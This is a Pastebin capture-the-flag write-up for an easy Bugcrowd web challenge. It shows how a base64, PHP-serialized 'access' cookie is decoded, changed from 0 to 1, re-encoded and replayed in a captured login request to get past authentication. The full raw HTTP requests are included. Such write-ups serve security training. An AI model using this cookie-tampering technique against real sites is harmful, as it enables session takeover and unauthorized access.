Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- BUGCROWD CTF WRITEUP
- Challenge: WEB_SESS
- Description: Nothing...
- Point Reward: 5
- Difficulty: Easy
- Alright, So we've got another login form but no description?... Seems strange so lets just try logging in with some random credentials and check the response with burp...
- Request:
- ---------------------------------
- POST /challenge_2.php HTTP/1.1
- Host: april16.bugcrowdctf.com
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Referer: https://april16.bugcrowdctf.com/challenge_2.php
- Cookie: PHPSESSID=p685nulc6jrp6he6tbitois8e7; access=YToxOntzOjY6ImFjY2VzcyI7aTowO30%3D
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 31
- username=&password=JSp%40sSw0rd
- ---------------------------------
- As you can see this is out POST request for logging into the site but notice how we have a cookie called access that is base64 encoded. Let's try and convert this to ascii and see what we have.
- Base64 decoded Cookie: a:1:{s:6:"access";i:0;}
- So here we have some data that is serialized and been added to an array.
- Notice: i=0?.. Let's see what happens if we change this to a 1 and encode with base64.
- Base64 modified Cookie: YToxOntzOjY6ImFjY2VzcyI7aToxO30%3D
- Lets replace the cookie in the request with our modified cookie and see if we're logged in
- Modified Request:
- ---------------------------------
- POST /challenge_2.php HTTP/1.1
- Host: april16.bugcrowdctf.com
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Referer: https://april16.bugcrowdctf.com/challenge_2.php
- Cookie: PHPSESSID=p685nulc6jrp6he6tbitois8e7; access=YToxOntzOjY6ImFjY2VzcyI7aToxO30%3D
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 31
- username=&password=JSp%40sSw0rd
- ---------------------------------
- After replacing the cookie with our modified one and forwarding the request we get the following response:
- "Nice work! Cookie manipulation can often result in an attacker taking over a user's session.
- Read more on OWASP's Periodic Table of Vulnerabilities."
- Challenge Solved! :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement